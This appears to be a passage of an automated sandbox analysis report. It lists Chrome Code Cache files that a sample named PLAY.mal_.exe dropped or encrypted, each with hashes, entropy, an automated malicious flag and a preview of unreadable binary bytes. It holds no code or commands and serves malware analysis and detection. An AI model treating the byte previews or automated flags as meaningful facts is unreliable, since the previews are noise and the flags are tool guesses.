        Preview:1r.5. .....;.|T...<.W6.y....IF....s.-5....c.....1.}..~9q.p..fX==.._...$.x.V..z>..6...*>.w.wUf....|cg........]3o.*~.":u...........^Q.v..Q.< ..I<.u..L..~..V.H.(..*..P8.b>...u.g..../[2i.#Mm....>.$...~l.b..#....\.<C........[..Q.y.Z!y~.L..Lf.B.3Y...t4...W...9..<.-....r......7.bH]3.....2.....A6..".n......%......5...p...t.........t......xD.....>......%.#.".V[...8,.D.H.9=?.....#... &E.;.V.).].X......%.9..)1.ar..XkdM`spT..'.jWb0.s.R....A.+...3wWQue"..g...}..q...w..i.u^-.2.`^Yp^.....-_l....eV..G..0-..........k......... ,}..%.?...U...].UwE...HU.......~6}..=\..~Cf.)..8.mt-.b....PO._W^U.RS.%Q..Q......B/..@...9M..g...9.=.....m.AcD..#|..8......0.....&.....T.)....& ...pQ6.t..[.w.@.....`.'.J...z...:.l...Tg c.L...0E...J.U8.7z..CP.....^&..[9.An.....1..+...,.z.g..A.....uN....0.IT.3....r..Z...*iH..f.....I......D.iM,.R.e.1..a.E..^v.6b..p......HD.2.....?82.}wx.Z2! .+]..b./T...h...d....#....]Oi.....B.t.Z#..mu.Cn....&..v.-%....yL.`.... ......1...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\520e3a8ed2a05fd8_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1576
        Entropy (8bit):7.867858960965918
        Encrypted:false
        SSDEEP:
        MD5:AFF6A25FD8FB3AC0651A9C699FE42DD5
        SHA1:F2B6CBA695A06088D2C0C83A692C0638F66AD309
        SHA-256:0F1B0B4581C2421ED9A7A353B9350E6969B4AD4275A77E595818637B75E0AB33
        SHA-512:167AA05843F6FFF1C18FA1F809EF92410A8A9A77CE39961C79F84F18C998444035FA8D5276378184FD05AC513522A7B33BEA2B49822039ED2347BE6DCD060E84
        Malicious:false
        Preview:&dC.p.p..t.....8~...g.Prj....0.O....{..3.p.H#egT.K.a..~....."U...@......"......D..l._.......*...u6.+S{..o.oD(:...9k..9W.-..B%v.8... h.......kB6G.nJ../...).LW.h.df.m^....s..l.._!aA^...q....Yvk)..S.;..O..;Y.#..*@.O;z.#.....bk^.........U.{i....\..j...U...}...]...z.])1.^G..S...I.G.......t[.......k.......z.A.|......C{..*4B...8. .[.k...{M^.M.@.9.z.9,y.K.IR.Hm>K6...O...g..S. ..:..U.T.x-s...w...,.y..+.........3&..O........Kp.........~..Q.).f3.N.@..3.r.a.eL.k#.p(.}..&....T..CU...W2..6)!..z..u...]...T..U.|.!.I>...........................aP._.O....aX.D.. .eF8S.S.v.../.`.M.`f.4o.`.8..".T...]|..l.y.....L....?...s.9a3.q"Rz..r.....-..Z.|3I.c........#..M4YV].....o....j.,x.[...`a....@.....\.c........x.<_[.9.B..VS..{4..b...$-...R..j..i.....T.,....K..dj....@......9.7].&..)..:pT^...M....,..y.!...9Tj{...2...9..G.-..h.(.W.zt...F/n.*\f.q.......p..LR.*....f..Q.4t.H(.L.T..........X...SH...0..E...1..O......Ds..B.gz.>.8Vl.......:...t6z....^.OJ.......R.Z....k...a..o(Hp.9^

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\54c2a35d39717397_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1304
        Entropy (8bit):7.8408340387349345
        Encrypted:false
        SSDEEP:
        MD5:3AC75B3FD75DE7B7AC7CDA857D71FB50
        SHA1:CB05BD2CF6F40D2A52AE6696FA9ED517F44E7A8A
        SHA-256:24ABA71FAA29D503E78A586A3E98C40B236164484733C5FFD865F7FFD227E4C9
        SHA-512:DEB8CDBD476A18B0B230B5DC21EFA9637CBCB4FF75C57AAEA05F4B7A70C00A45100CD69A549C66C50CC5D3E9B8AC3B23E6DF35562E8D5AE911FDD9B66B4A56CC
        Malicious:false
        Preview:fC.........AVb........c?....g|.^.V..:.j<.f.jq.7/.|.{..[S.4.;.......Y....`.y.|.L....]...#QFurK.J...10Kx.j........(H;8j..l@..t...^$2&.....&1..M6.....>.'<.".3.k%Nx.7.gJ.l...$.J0 -...-..,...T.6.2..En.\.;.}akI!%`tDGoY.^m.F4{BK....jz}...T..U.|.!.I>............................=...i.8.f.IZ{.pB..9m.;.". .7_......u...ub.........x.X.0..n........ih..x.].{..6..]..{.[D%.....n...Wf)[...`5CF...R......P...]..p.R..(3.-.7...D3.s.t.e..%...}.....l}2.RJ......c.U)..Q...S...8.4..x...sh...t.B....y._....?.../.$.t....`.Zv,.k.^.&.ne...@....f..w.5...z.?(.__9.L..Bc?.0..'Z.g.+........~..fR..H5..E.:...8..Oq....Q_...R..>Bj........;..%l.M:*%.6./..K.%.tn.=..... N..3.)/..?........Y8W.....J!.4.T...}...>q.s4...H..*tV.c.6..+._ {.@..OB..s.|,.cj..%l|....J.".TX.|".@..0....t.@W.o...).p5.E.....g2.._{d..X....7.To}o....s..rh...R..::.+....z...8.8.....$D..../o.m.?O...|..o.P.)..A.&;)~.v}...w(7Q-8..)).x..EL..i..p.M./A....Ls<.X)(K..?..B|B.."...l&..).........2....=I..c......wQ.|.4....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58ea1f927c503c2b_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.908517598626901
        Encrypted:false
        SSDEEP:
        MD5:568D45EA277A43F4CD0F3BB1AC3852FF
        SHA1:A22A044D0072E035B89744D391EEE9314A53080D
        SHA-256:6339E144F5151B5515443017AC072C9241CBAF6D1D03A47F6054B8CA6ED5E0C0
        SHA-512:0CEB45AFAA45BE538D4E1DF15C5C1BC59E3956DC6CAF813FC599F433B6A8866250712ACB45D5C02C84E7198C91330F054E4305656B1057F6F7AF762DC6936263
        Malicious:false
        Preview:%.x0$.wS8w...Rx...b.9a..1.6.Z.....-.pn.....R..gX|........s......./M.o...gt..B.'.XT.e.X..Q.&...s......e....~|...]!.O+..$.A...&...$K.....^.0......FW(..&..!.=.......84.r.X..+g<.JY..p..qz.*.......-........r.....Bx.'s.0....#7....B3......n......f.:.(.%....m.G..X.foQp..^..o$.......Y7......K..Q."...S.._.9....l4..q..-;.....L.6.M.........G.8.......7....n.G.Kg+.,s(.T..m...xO.......&..G.(.4...3.B.t..%.P.u.>mL.%..@..).%#?%r./S....&..s.(...J+.\o..,<..G......8..h>.<.......4.)$8....(..h.7. .I.{...7.GC.=K.....w.........a.Y.'..J......>..GY0.D..Di..\.dZ:..C....DKZ.......|....P...u"......I.h....k.G....#.`..@...z..m.....Y...U..u.B._G1......U./.Rm@m.z.6...{..J.,....o.c....j..t..@.P.^......*..<Ke.Z.]..6..tl.D....-.....>.......|.=^._..G.! b.:.c.@W..Nv.......Ia..6..f..`...h.)f.1.....Bz?.[..A[.-...U....2+=.jY.....7..F....[(R.U...F[.*.Sl.x.~i..6M`.vd..{.I..;h........5..8O..|..b:..$P.9.6n..s...e.....`...,..H.a'....yw.k$.]...e.SV...xiT.y/...I...^E...T..U.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5d86ce9f97b83b7a_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):92584
        Entropy (8bit):7.997833824521771
        Encrypted:true
        SSDEEP:
        MD5:8277D4C4E7C4B6FA61C2AA3E083E56B8
        SHA1:A32708766C5488699E79A190B5F798B4E5EA3981
        SHA-256:67A641EDA50CFDC56BA31C2ED091E4A4B6388B2DC3E3D9B5ED9E0DF606226735
        SHA-512:270CD1A4C18E3C85A255527B23C858FAFE8DAFD29C3C2D21DDD64419421E0BAA421724BE07C03FDABC40B310515A2865E461F1473AE86BE0512568E355EC1B78
        Malicious:true
        Preview:..t......;.......s..M........+r..........5,@.>s.T^...];w.,x.&...;.M.#....N.[ql ...h.&.....>W.af+/2)i../a....X..V..QRO...r.....l...^.y.....>4(.M...w.R)73km.e....([2;.a.&...Q....X.i.P..T....7Q.sY....v........!Sr.R9.s._i.&>..S....g..Q.z..w.$.x......k" @....L.=C.#.&......s.Bg:......B......./u.l5..P$'.|R.............m...I,.2.5..47..VQ...K..;.9...3F.:...\.....].6M.p.....+...Y..m....E.i(A...KUZ........1....h-..Kf...{.....J...../d.)...sWM..]gB.j..+o..kG.>/...4xy.F..W.bFh.#....BvL.s=sQsI.[.....[.B."=r!...... W.Y.^!Za!..9H......^./K.........c....Pm9...;z..1)...M.+4.^4...<...@.m.Ay+.e..j3i.-..q..z&..P.\f.vI[.G..??..-...1.|.....WS...z..$...O....AM.!. ...../..~......I)od.T....g......_f.......M.m.......t.!..,....X.x.0.9MqG.`..P..l.I....s@:..%2%.../..+.`.l..^&m.%>.Ds..L%..<)...,~.......J..EOq..R.4...4..t...k.I.D...=...e.B.Y....... }@s.<.y.....V{#).k......I..I.t.$t....>.........e....+.|..)%+.........7...#.k...e/...V.n.....'.......^sj.W.2.X.o...N.0s..Y........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5e3d1997942e96db_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):151656
        Entropy (8bit):7.998873528380435
        Encrypted:true
        SSDEEP:
        MD5:45218BDDEAF8B128E8EA7CEC8A1DD0BB
        SHA1:A83277973E132AFCE181CD7AF7F13FF14B3C5EA4
        SHA-256:CC2E0E14E91FABF595B2BD3BAA2B3AD158D1D4D811CF27567A57CA07804497CB
        SHA-512:ECEC4677F6DE0B4AA2964F17ACD15C8F1F5FB7EB9F9FE9BE5790B5DBB71A8E3DB8C15A79BDD15AAA831F2BA4EC796F4A80BCACA94A6BB28D46D96DDF2010FA3F
        Malicious:true
        Preview:.........0aq...I.5..4zh..i:.\;.....X...f)].I...B..,..O_....X.Y.?....p\....A#...."8.....~.o"B....)...SMh..8....C{..a...j......V.>..P...-.Q]..%`..\c..'...........kX|....O..W.[qu..........cb...N..m..d.x.[{..u.....?..e2.....e..&|c.q..gf...i.c.......>..G.=...N .."..2.N."......(.....b..ub.....w.\G5..7....b..;.....U.S6M.>O.....p..#........ ..rC..R././.<.w...|.G%...|..A...........>..K/QE.:$fj$..c..q...`..*.T......;AN..[6.X..*.a..e.$.,.Y...8.j."Wj...[..um.&...&.q[G.a~..[W...mt.:.L...*...^..h.Z...3.:...b.Ag.@..S.....Y...F V.|.V..[9...A'.2.y$@.....'..u.'.xE.(.(.x.f.>=....-.E.Y.X>..".<..\2.]..f...a......,,.*#.sr..E.v.q..;....hVvz..L<..<5@Y%bka...%..".....j....@Y.z0.%....b.*..s....k..9.#B.x..:?[,&uu..5.MLZ..:.1.I....t.l...M..oa.55..N.8xi.s9L.....@...`.zK`w.........1.~.8.B...._...N.C......_Rk.{.6....`.J...u..zl.Sm99P..a.....(.Q..:EW.%....%.<........*...5]T.A..f..:...Q..g8...w.....0.9...r........S..=.c.$......m...5o....5.-=.....Yb.HG-?..._.../..@[

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5febb783fe057117_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.900038241033705
        Encrypted:false
        SSDEEP:
        MD5:7A94FAD91B89E43B09A8224011A8D468
        SHA1:A66B953D8BEBE5059324461619741DFCABC2E7BF
        SHA-256:627ED0A116664A7096C896766EE1E91C832D0F3C5DDC5D9F1077EFB1462F6054
        SHA-512:73E774C7D6EEF1A31B2B3C8C8EA6FB78047DD4025603D20F6B24F4B11EAD504DE10188B991D92B95AE120DF2A0CAA73E369EE12C0FDCFEDB214AC522600B7D2C
        Malicious:false
        Preview:.{.....?.<...D.<.#..&.Q.....*|.$....YiyQ.]n(.....%.dO.tW...A."vYz......:.r6.M....>[......0.....U..J...f#.2...E.F@.-..<U:.b .f...?2..6.9....X.@...]..c..K...f.s.k...S%.*j..~f.|./.2.......c.uz.s. 8.T.r....Z..y....|v.j.....Z.c.-c..f...[8.!C\j..8.<.fe....%hq9.3..H....k..Y..Z....\....2...6..6s!.;......o.......CE...Y.(3......M"..y.WI...D.=.)5..ke..[.Zx.*.......C..4J.:...~..G.`.6....!@=.9H..'..<l......._..=~.8e..DehJ....P...)x8}.R?.e@v).....y..S....]r.UL!.SH.26...8c.i:.{.N....o.....$.C..$..d........4.F.pB5....).t.<a...p..y..=.Z.7.=....:...E....`.D............J..S.>l`...k.k..IM.j...0...Iu.;+.D.J.....U..]......q..N}_Kc3........?.J....N=m.>.Mc...|..Wqn.....G?|o..?.WS.'v..4..uva)K......P.b.......A2.GWy.k.Z.W......(...QW..TTQ.....&D....2XHo........6.....+.B....z..-.+.$...?tsM......K+..2....w.c....S,..+..WRg`...*.*..>x^1q.qF1..<...'*.6P....?......>W..?..K..{... .....^../Pi...n$5..e.W."./\...g.......3.r=...T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5feda46b7e0a1749_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1832
        Entropy (8bit):7.90018420003648
        Encrypted:false
        SSDEEP:
        MD5:24F4F3671A8D100D29C59ED466F46422
        SHA1:E58528FBAA5B4846BAB610492421105BDB43C5B4
        SHA-256:5B80F264E0A8A6BCBFCA859D8744025680BD3682087634FDB76567EC59DDC53C
        SHA-512:12C55BDB223AE7DF5F63FBDE9A1765D87D42DD7AA6FBFDB45204CDFE8E99152061829FEAC70276A0D7079CB7128A0D8E27191A7E6C5624CB2DE61913D1596763
        Malicious:false
        Preview:.......#>..Z...V.9.c.R......Y.c.u...U)......N...tX......s..........B....Q..yY.:L..8.].".s.."R...u..b..9.....-7<.Ne.}...e.S...K.f.6....EbS..O......Z`i.c......~.4>B.D6...Q..q.D.2.%M^....C...B\.........f..:.q^."...LDb9.h..A!u....y.$.Q.E.x...a..C....;..$.hC7.~.JP...vn.r...{..~...`D....K@O...o.%.\..V..I..&G.Bs...Y....S...Gi..\..S.T8..X..-......c..`3Qxi..?l..`..3.>...Y.zCd^z.GM.N.......4....D.`...JP..........n...G4.H....."..,..C.......d..w!..0....VM..3*UX...P.....\...n.-.C5..-R.(h.]....=4V..Q..mS|;..'.!.p{....(.r.?.....OW..../..g..GR..../.3...B.\.?W..E ./y...z&.a!?...../.y.Q......N......S......$nk0k.l.....B...1b......z.'...%.~.{.!..{.Je......wto....}Ie..F).pD...vy5.TW....3H.Vm...j}5k.V.gE...v)....s.E.@...+..T....>.J.x..*.}.......T..U.|.!.I>..........................).8c\GU.W."..u.Ww....p......$.i.4.fe.%.D..Lo.R@t~.._.cY~.d`...../....T">..0f..J. :Z. .&...3..c.%h;"W.....B...+.Y.....4ym.~lF..lV.~.F..!.<V.d.&.$.u......~....k......8y.^.T.....H.tG...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\6634d30d3dcbf0b9_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):188072
        Entropy (8bit):7.999181743122637
        Encrypted:true
        SSDEEP:
        MD5:563FB0CC596CC76FB53ED9D947453944
        SHA1:C61BD89C33CCBD5A11EB41000BFDAB789B04D2C6
        SHA-256:B90205AC4E8039292DA73BBFAEC00BB80D49FB521E9CF946048908AFA2410A85
        SHA-512:10F7A8C5C83989305E252494FEC3D834DBA0AD6041949D129D4DE6F817B098E108201D03AAD95CAD60D2CA15739FD392B58BE4D265D951E17B8286DDC35C7F7C
        Malicious:true
        Preview:...9a;d..DPcw<.xy.]Q.&Gw.rF.|.Dy...}..$xC...."y$!.j.. ...y..w(a.l..V....K..W.T~U..P-..."..c...~J.-..)o\......._.........\.-.G),D...h..5t......?.z,.^/.=....K....l.........<...8.P....$../,Fvy.....M....N].5..z.O.\..]......j.....I.A..'!...aw:.".......WT;.kV.......Z.R5.t...b.H....*Fa'..JH.^^.8.......xO.(..R..g..yT.u....H..x.............-Bw..R....VC..E..S.Ha.E<./ej.8..oH6*..-Oe_..u.\*.......~...H.H.yE..h.....N<.F.P....o..........D}.N f......9...?.p.y..|.].ks...W.\....;.4..zN..h4cQ...".?.....W...].O.......;O..X.pW^.....l/UOz.M^....yn`L..k.q#..h.pl@.&....k.].*.S.v......Y.... 4....x....F...=>.@!t..,...8.M......AY'.....f`....>.H..4.K..Gv......Q....h.B.og../..;.h.!.(.9-..d...&....K...v!9.Q.2.b...8UdVl&.D`A.#rTM.$..1..d.b.k..f.Vv...N.*:U.....8...V..oF...].z..6!..*+b.bO.....Z.}.I........D....f."y@kT..P..z.>.. ..Q"6...MV.;.x..J.0.l....l.}.Y,".t....c2.#....Cx7?,.fr..{..a.....3^.cY..p.[..97.*...0..6.0......#e7..[.g-x..J..C.q.:...$..@.Ry.'..&.j.>.(7Q../.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\70060c5e68d24ac0_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1832
        Entropy (8bit):7.889732881811462
        Encrypted:false
        SSDEEP:
        MD5:4AE38BDCC51CA7244B9D2F5B577BF007
        SHA1:F6B738142AD9E851B37F0E9C101294B05081ACE4
        SHA-256:7850A906CE3A5BF43E0A552E9549172D394C3C66B538F4DD51E0880C3C5771BE
        SHA-512:ACD195BFB0787350A30D6EC7A329A2E789838A290A2DD491613B0FCC26AFFD20997A5B3C3EEC7891D3F9AB5A58D4E7B7159F9CDD016F5D11EE39DC0D9F03B759
        Malicious:false
        Preview:~[^.Mr...K.qv.lM..bJ...%..u.n..<......;.).w^..C@...h..Z....S..W.."...U.b......./]..j.b.9..rY.....wy...O....&.!2.....sd.....&.....@...n.-..... J..T.5.W2....a'..Z.g...o=.a..j......C.u....Cf1G....a.\.,.._...&..%.C..c._q...'Y..(m...<...1._.N....D>\.. .]...r)..`"...i#...~.....nR...H9X.Xr...Wq...9/....F..s.9..<...>b.YN(..E..U39A>.*.>1..0..g....|...'kl#.C:.8Va8.o.vO98....(..a.#.2......p.B~.>>.....}.2.?....n.B...p,........?..r`..UC..L.3J1...F.3.s.m.0._D[...5.k...f.t.... I)oV*.i..I.uQ..;......A.(*...Y.i.8./0."...`...h.B1..j.{21.gda...76...#].z@o....?.W..r..25.+..*b..w.J......Q.C.........%'\A.Q\R|...x..5...G...H........z..<O......k._6h..+0....]7..$.C..\e}...o-...<_;d.Sx$Fq..YOi)...0ML}p..AA...=..B.i....eC.xj.....@.{.ZJ6...z.ae...8.i3*.....Iz...T..U.|.!.I>.............................t7.*..A.d....[M+..1........L......S..I0}......3Q..}.B....`.]2....Id.a.j*..I....n..j.H..........}....U;...P..PL.iD..l.,,RC...G....f.`.I......u*..b.iZ.zX3V..1..qB.Y=...*.Vi....)|....G

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7024e62dc145f17b_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1576
        Entropy (8bit):7.873347752612051
        Encrypted:false
        SSDEEP:
        MD5:ABC50E938039C60918109CFA17CE92F3
        SHA1:D952EEEAE07BC0616B6590AED2DC199C35B3CE62
        SHA-256:D645DB79B1F6A30990597F7AD90D727CB07E3D37A31A9C63C110EBBCE2B762D9
        SHA-512:6D80183DFDD07837B7E005F5C8E3596BD1FF8A673FB8A9C1658E0C316C75F3E25588AA052A0D80A6A25A13CDA212BD58ABA8F52C4B817C3D27DFD16B99A09B26
        Malicious:false
        Preview:xjZ..\.../\.W.].A..|....k..>..x.....!Z;...@#o..~#o_._*[..g.r......ZH..V\:A.6..$..6tP.Q..%Y.sJQB............Q.a...Akn.=.hY\..@.6.=.%........+..>.2\...'......F.._X.r.....,.`.6...*Fa.6i3.\.=....S....F+a."..._....o.p...wc...W..?f.....L-...c.Qt:..4....<.'.f.g..D.Awya~......dR.#-..v.=.....#..?./.....S~....U.l.&[..%.>.c...LPM..GI..Z.^Yx......u.....k.R..nK%...3.|.y....,|}r..Fg...S..M....\....+.0..iv.W........x..Q..#j..R. ....F....`h....&.%Cq*.!.9..P<.u.j.nI.?9.g..Kb.......F.,%T.......T..U.|.!.I>..........................?7 .... ..\..8.B<S(..N%.....Z.dM...9.F...tQ..O.@ 4..R,...#....."...h.O..o..GV.O2Y......*....q....NJ..r.Z....+U....B..)c....-..j3.r..l.[l.q..#..d...:....:AA&QL.6.1..'d..2.Zj....5%...$!}~...<.pb*9fU..q...Xg@#~M..lV/...p.4Z...d..I.S...u.j{9C.k............L......8.>..a..'...+.7..tC.h...[8.N..(.:..\.'........z?&...X...O.....%.....}.j..1x)..+..\.b{...z.6..:...T].RR.(.Y.......D-}.. .........n$.}....._@..7<..8(..5...\W{i. .#.o.......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\781eda116020e748_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.851651771553716
        Encrypted:false
        SSDEEP:
        MD5:593B7C5B2875D73B96C7081E8DE666FF
        SHA1:B8434A667711FB2E0B6C7FD75EE56191FB2672FB
        SHA-256:CF7E7A7FC4A1B0194BC3D5148BB607B1808FE984D5B6035EA9978B01D0A114CE
        SHA-512:68DBF166BDDF96B60E8525E66954BC88AFC825BA580DFCF91A70F7BDE230669EF980AF5EDF8AF37846AA449409C9A5F43D33390A08799CA3795210C02BCDBA44
        Malicious:false
        Preview:.3.^....!.9.......<.f..N..ub{`..%w.gL..qf.XB.F....c.mTFi.;A6.?b|.&.(....S...^....!{..........\..~.P.-.-.\8...........4...:. .....o..[ *<.y9_.....u..6 R.... .^....d......u..6.0....@../....S..Q....m..P.f..#\..a....6Y..|.d.......*.L .....^.......d...t8..?/Rs..+T....?.*...hj..E.G..74w.<.H.-$..o...OZ.z.4y..^.E...-mW. ....D..1.j....%H.O`......7.b....itX..I......*>.,...T..U.|.!.I>............................3..0Q0R ..i9*8..+/../....f]X.U.o.h|.>.zo...X...l......+$k<.,.t.y....%..]R.V.E}.S.......Q.....$.....-...c...W.[....f.7}0Ctjs...^DW.....|/...;gZ..R..%.\..9....eu...;3...o...@4..}%..|p....e....=>.b.3.._x......O...&....n..4.S..#......M.&......o.RO.:.j.%..:.G..?...i...xO..Z..^t.rV&.!G....r.....X....H......q-.......$.... _.e..?.It....J2-..[...A.-.`.......=..y...<D?-'.....tXo..3.z.....0.c.....i..,.H.9~...M..E.5O.*/....k..07.e....Gs..$G.R.#.wo.+.T..RW..8Cm._S...1...k9Jud..%.U.g.@..yX../.h...../.......~.....xV...&..2......V.W.)W..)..|.H`..:D?..e..m.[j.,..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.861103773653722
        Encrypted:false
        SSDEEP:
        MD5:087D3168B9A4FEF4F1A64744098888B1
        SHA1:6003D68420E8B394A70CB39B5225C316F96633F1
        SHA-256:31286D29BFA01D15036A393C49E23A2D7A3B3F39ADB8FAFBEAE4923B9BEDAC46
        SHA-512:F7C0B67DEAC8964BB73DC4CCECAD520D6201EC5D3C11769F1285B4BE7922706BFCE187F789F172447B9300E113CDCD41DAB57E603CC4F9F44973958C712761DF
        Malicious:false
        Preview:.w..e. S.5.3..y.t..#j..%..d..xeU l....7n..)...i.7...-.....B..|.q5b.x.2...'.f.>.A...m...O.$(9..EM.=..xZ.NY|Vo....@..P..aLK*.z.w~...L...y)..........n..p...'e....Bl.0^9+......>2.`.EJ.....y..@....s..{..L!.x.B....bh..^..*.lzK;.J....d._....;...{\.ygd...g...... .>.y;.....o...`<H...%j.{.4......L..dA%.....-..5.T..[.ZL./...b. '.7..%.../.6+x..O...6./7C..........0...c....,d.y...C.t.y.oR*Qe.0...T..U.|.!.I>.............................f*.[8.../lR..+..h.kI......$....1.P...H...{....h.E..K]m...^..x..q8.s+'..PN....z;jR.;.w*x...~M;.,.+?........f%o..tm). ....^...U........h.E.)...d..yk5.....K.9..-....J..zBm5%x!e.^dS.@^Fi.V.!.v.$..0.".c(T.C...="f..L.be...\.om2..3. ..N...R...H-.:x...s...f...'e....F..y9..x.....N\!.rG.NE.7.....[E..w.k.GW^.........bM.......N9....K_.bB.L,z...]KTMq8A.dD..A...*.*.......}.3..}2...=1!.....h.b](..'.....1JF..J..U....B@....;#.k\...,....j..0.q..vW.ja`H.......Y..........q...cK!.....t..4|..X...1....[.br..il..4..3....Z?.9^.e.(.).f....e..E

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\830eb3248d9b5d25_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1304
        Entropy (8bit):7.839251293043212
        Encrypted:false
        SSDEEP:
        MD5:6385279EEB7E10CD23111AE4D17F4EAD
        SHA1:EB7D3A95929D3B0438E1DCA0D19621CCB53554D7
        SHA-256:73DAD7210FE42A5C436E8D0842AF7076E0C5A8B697A9E90CD3A5C81AB1BFCF32
        SHA-512:F2F8E84B2D09257007DE95A3BD8B259D46C7AD0B4C81F0358887EA9771ED8D0AE35FDFC4EC918B45E86CDEB6C91F1CAAC8851489DBE28049174BC902BC25C8DA
        Malicious:false
        Preview:WN.th....U.3.6.._.XU.X.>..e.t.R..NjT..:...R.Os.......Y(...H..2....U"9<Y.......5O..#..E..C..p..rDUog.y..oQ2.Jfv.."8K.."d.....7.?/&'.~.|....Jmd..w.y.Qz.A1;hO...">.v.^X...J#z~.G......9..sKrI.&.....i.>..(..+...B.`"31@6..R...n..9y1.i9Q68...T..U.|.!.I>..............................+$.*n+..U...i.J.6..X/>..ohs.^.....c.|N.C.......m.k..?........X..g.Z.#k.!w..;+~_..l.8.>y...C..H.9..A..K..*.....{......W.6..NV./..T.G..i.............?E.EA8~...........f....L..................^../v.a ....M9Z.o?..........=....OZ0.x....>....q..t*.....r.9:..p.*.2!b(..f..p.J.{...f.......X...\.....>....v.....8.pK{..'.9`.....Q...I.M..+p)%...8H.....qzZ.og.r.0.&...V.R..@..D.QQ.x.L......Vm.Wd...rJ.....#f..... 7w...n...W.E..w.N...l})....."....<a.c.*n_@eB.p....A0._w....i*....$7..E.:....3{........Dl.W.K.n.uI.2..H..(xui...J...5....;F..jW..A"..z..i.z..v.(.r..ai.....&A..j...m;nd......@_.7..9.V._..;i..J.a.nV.T.bf.BZ~....a.@.Q.#..e...^\......0...~....@./i..3\..R......s.5+.$.<.~......#~j..m.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\904d92f9077f5bc7_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.841382181949801
        Encrypted:false
        SSDEEP:
        MD5:F56F4C0669928FA889218129C95144DD
        SHA1:49C5567D7F5FD8A48F487EA3044F6BFCE7A3C210
        SHA-256:93E809988B4D6A5CCFA1A1D477F52607B3D05B9BEAC981CF2AFF95F1C7A002AE
        SHA-512:F39264F1004767E3E4430F434227F751C0FA07BC86E69E5D48CF741F8C08EDA0EAE9E1F221E7EA2AC2DBB9C61DEB4264D7C0E4C72625D38AC1FBF86AF611B010
        Malicious:false
        Preview:_..?..L.2.f..Q.Hj..D]u[4W.Ls..\...1-.].9....l....-D........#.|..?.....X..}.......r..~.../...n.a.....X....?0..:E......B....q.LX.dr..BT)F.Q...*....H.=.Iv.....8k.Mt.r*.@.V......Y..}.c(.l.....g&q..V..G..I..6 S.l.....T..U.|.!.I>.............................ZaMmQ.@...X.....`<.L.....sOe.....Mko.N...~.2.H..O[...#.u..C]A..A..p...z.:...sM..6.C.+t.......[........kb.bB.1..".\.dNNrq..,c.w8... ...tT.\z.0.@.._..7.s;,l.3...Q(...@1....e._9L..*...<;..Sl.d.'..C....7.fbp&.u1T%e?..8jc..O...-..b.}...o.t....n.Y}G)...|...su;~..-...s.>._.SP...!.$..;..h.....!... k..9...%K...^m..#._=...]z.1.E........9..?.aNfL..k.<.%5Md8.Z..(..D...g.2.J..qb......A..0..@YZ..sv q.t.(..5:..)6.....|...V..3L.2..:.v..s..7..Sw....4G.048>...{-....:HBqQ...#.....j0...D.2...3.....M......`...hW.9..^`+..C..<.Rq...f...1.V...w'.@....1..sP.q.J....aC..>}.*.V.....(..Oy=..X...<.Kp......{...?@..e!..XY~'2..]....L.[.a[..k.e.<.......`.~.wK.Q.pA...i.<...3.#.d....2.f..x......M..6...Ry.dt.....|\.0..a{...F>I.H.7.Z..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\92ed7279d3e98be7_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):93464
        Entropy (8bit):7.9980343114266805
        Encrypted:true
        SSDEEP:
        MD5:377D936093E85106A449B6DDC6AE322C
        SHA1:C97C935BDB669998D63784B125DCFF11BC723819
        SHA-256:3FEA8D8DEDBB374100A6F163D74DEC9EDC3FA272E57EB61021F2ACE6F90A4CA0
        SHA-512:3592BD85B7EF1D0E080C184F714D3F8FF28E9875665C566316F408F8E22A4B45A85B9B2E2DE29E9F0CC24FB1D2BCADF37ED188F6B279267D10BAE68704F3B758
        Malicious:true
